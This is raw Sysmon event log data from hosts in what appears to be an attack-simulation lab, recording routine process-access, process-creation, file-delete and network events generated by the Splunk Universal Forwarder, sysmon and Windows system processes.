10:36:49.498{4F8D34B0-0E41-6216-F903-000000003902}18323416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:49.384{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C416CDE454B538134428AD9F063FF5B,SHA256=63E294E5DD433A12FC9E9507DE1B3479701A00BCBB7830AA4A898132885977D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E41-6216-F903-000000003902}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E41-6216-F903-000000003902}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.310{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E41-6216-F903-000000003902}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:49.311{4F8D34B0-0E41-6216-F903-000000003902}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000285113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:47.598{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53228-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:50.701{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67986B851689177C409EB2D5FE80F4B4,SHA256=E209BE40C7B38C341348EAF51B96E385198FAE243C4EF048BC03420A06D62F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:50.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10BFAC011B56F2D75F51FE8A880D018B,SHA256=FE9F78BFF4356DE1FFCA350A55BA373F62A06EFA455535A2DD84103E081862FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:50.326{4F8D34B0-0E41-6216-FA03-000000003902}7123588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:50.326{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9599B40EE9602D126EB1F7FAB98B8AD2,SHA256=7EC43BC32E4C5B0E0C86FA4C21A3714A6B568AB8BB72E57EC509105990F62C15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.701{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A780DB2FA90DF634424273EEBE5FE722,SHA256=C502B86231DDC030B44572A3EE5EFA7736D6B3F06A4FC67BC127AE36C6ACACA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:51.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1B1804263BDA8ACCA91407D0FDA946B,SHA256=1CD78AF9C142DF20D00960E62A2A1C3EB654FA2A87D81BD4C7763E72ACECD31C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E43-6216-FB03-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:51.607{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 